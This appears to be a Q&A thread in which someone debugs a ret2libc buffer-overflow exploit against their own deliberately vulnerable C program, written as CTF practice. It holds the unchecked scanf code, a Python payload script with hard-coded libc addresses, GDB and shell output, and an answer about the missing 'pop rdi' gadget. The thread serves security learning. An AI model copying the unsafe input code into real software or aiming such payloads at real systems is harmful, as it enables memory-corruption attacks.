# ret2libc: sh: line 1: command not found

Tags: c, buffer-overflow, libc, exploit

So I've been trying to develop a ret2libc exploit for my program as shown below:

```c
#include <stdlib.h>
#include <stdio.h>

void vuln()
{
  char arr[0x10];
  scanf("%s", arr);
  printf("Input: %s",arr);
}

int main()
{
  vuln();
  return 0;
}
```

I've compiled this program with: `-fno-stack-protector -z execstack -ggdb` and I have ASLR disabled along with removing my environment vars, this program is also set to 64-bit (since I'm on x86_64).
The program above is compiled to `sys`.

I've developed the following stack overflow code:

```py
from struct import pack
padding = b'A' * 24
system_addr = 0x7ffff7e15990
binsh_addr = 0x7ffff7f6304f # from libc, points to the string not the actual string itself
exit_addr = 0x7ffff7e07590
ret_addr = 0x55555555501a # need this since the stack won't align and will then segfault

payload = padding + pack("L", ret_addr) + pack("L", system_addr) + pack("L", exit_addr) + pack("L", binsh_addr)

# saving the payload to a file
with open("exp4", "wb") as f:
    f.write(payload)
```

So this exploit unfortunately doesn't work. Here's the output from running the exploit in GDB and then in my terminal

```
gdb-peda$ r $(cat exp4; cat)
Starting program: /home/ena/.../.../path/sys $(cat exp4; cat)
/bin/bash: line 1: warning: command substitution: ignored null byte in input
pwd
pwd
```

```
gdb-peda$ r < exp4
Starting program: /home/ena/.../.../path/sys < exp4
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/usr/lib/libthread_db.so.1".
[Attaching after Thread 0x7ffff7fb4680 (LWP 20565) vfork to child process 20568]
[New inferior 2 (process 20568)]
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/usr/lib/libthread_db.so.1".
[Detaching vfork parent process 20565 after child exec]
[Inferior 1 (process 20565) detached]
process 20568 is executing new program: /usr/bin/bash
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/usr/lib/libthread_db.so.1".
sh: -c: line 1: unexpected EOF while looking for matching ``'
sh: -c: line 2: syntax error: unexpected end of file
Input: AAAAAAAAAAAAAAAAAAAAAAAAPUUUU[Inferior 2 (process 20568) exited with code 02]
```

```
[ena@btw path]$ (cat exp4; cat) | ./sys
pwd
sh: line 1: $'\346\377\377\377\177': command not found
Input: AAAAAAAAAAAAAAAAAAAAAAAAPUUUU
[ena@btw path]$
```

```
[ena@btw path]$ cat exp4 | ./sys
sh: line 1: $'\346\377\377\377\177': command not found
Input: AAAAAAAAAAAAAAAAAAAAAAAAPUUUU[ena@btw path]$
```

> I should note that trying `(cat exp4; echo ""; cat)` and other methods of controlling `stdin` have not worked.
> I can say for certain that I am spawning the shell and that the addresses I'm using are correct.

I just can't for the life of me figure out why this is happening. What appears to be happening is `sh` is reading my exploit as `stdin` because if I tack on a `\n` to the payload, it will immediately display the `command not found` error and exit out (but no segfault).

So I thought this was some error with not flushing/clearing `stdin` so I added `fflush(stdin)` right after the call to `scanf(const char*)` but it didn't work either.

Any help is greatly appreciated.

Comment: I'm curious: I see lots of questions about writing  buffer overflow exploits here. Are these academic exercises in computer security classes, to understand how the exploits work?

Comment: @Barmar basically yes, this is a simpler example of a CTF I was doing

Comment: I have similar curiosity about CTF. While it's useful to learn how poor code can be exploited, it seems like people spend too much time working on the details of getting an exploit to work successfully. The mere fact that you got an error from the shell indicates that the buffer overflow caused trouble.

Comment: It seems like the only people who really need to know how to making working exploits are hackers. The rest of us should learn how to write good code and solve actual problems.

Comment: It isn't a necessarily evil intent to want to create an exploit, since there are bug bounties specifically designed for people to look into a program/source code and develop an exploit. This way the company/person can patch the newly found exploit.

Comment: It's great that my exploit is working (to a point) but it's not letting me do what I want and I want to figure out why for my own knowledge.

Comment: You are getting errors like: `sh: line 1:` The shell should _not_ be involved in this. In particular, you may have to send in binary chars (e.g. 0x00), and the shell complained about this. You may need a launcher program that (in C), opens the `exp4` file on stdin using `dup2` and then does `execvp` on your target program (e.g. `r`???). Here's a fragment: `int fd = open("exp4",O_RDONLY); dup2(fd,0); close(fd); char *av[2] = { "r", NULL }; execvp(av[0],av);`

Comment: Oops, just noticed that you compiled the program to `sys`. So, in my example, you want to use `"./sys"` instead of `"r"` If you need `gdb`, then it should be: `gdb ./launcher` instead of `gdb ./sys` You may need to manually load the debug/symbol table for `sys` manually.

Comment: @CraigEstey could you make this into a formal reply? I don't quite understand what you're getting at. The null bytes are required for 64-bit addresses.

Comment: @CraigEstey I tried your solution and I'm still getting an error, what distro and terminal are you using? Maybe it's something there.

Answer (score 0, accepted):

I solved the problem, the issue was is I wasn't passing in the `"/bin/sh"` argument into the RDI register (in x86_64 the first 6 arguments get passed to a function via. registers). Unfortunately for me, when I compiled the source code on my machine there aren't any ropgadgets for `pop rdi; ret` so I cannot use a ret2libc exploit.

Since `system(const char* command)` passes into `execl("/bin/sh", "sh", "-c", command, (char *) NULL);` the error here was that `system()` was being called with junk data already on the stack and not `"/bin/sh"`, hence the "command not found error".